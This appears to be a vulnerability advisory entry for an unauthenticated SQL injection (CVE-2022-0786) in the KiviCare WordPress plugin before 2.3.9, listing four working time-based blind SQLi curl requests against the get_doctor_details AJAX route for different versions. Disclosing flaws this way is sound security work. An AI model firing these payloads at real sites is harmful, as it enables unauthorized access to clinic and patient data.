Lucene search
CydaveWPEX-ID:53F493E9-273B-4349-8A59-F2207E8F8F30HistoryMay 23, 2022 - 12:00 a.m.
KiviCare < 2.3.9 - Unauthenticated SQLi
2022-05-2300:00:00
cydave
104
kivicare
sql injection
unauthenticated
exploit
version 2.3.9
EPSS
0.04
Percentile
92.1%
The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users
With at least one doctor created via the plugin:
v < 2.3.4
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5bid%5d=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)' --data ''
v < 2.3.5
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)"%7D'
v < 2.3.6
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)"%7D'
v <= 2.3.8
curl 'http://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b' Related
cnvd
cnvd
WordPress plugin KiviCare SQL injection vulnerability
2022-06-15 00:00:00
wpvulndb
wpvulndb
KiviCare < 2.3.9 - Unauthenticated SQLi
2022-05-23 00:00:00
patchstack
patchstack
nvd
nvd
CVE-2022-0786
2022-06-13 13:15:10
prion
prion
Sql injection
2022-06-13 13:15:00
nuclei
nuclei
WordPress KiviCare <2.3.9 - SQL Injection
2022-12-19 13:23:58
cvelist
cvelist
CVE-2022-0786 KiviCare < 2.3.9 - Unauthenticated SQLi
2022-06-13 12:41:32
cve
cve
CVE-2022-0786
2022-06-13 13:15:10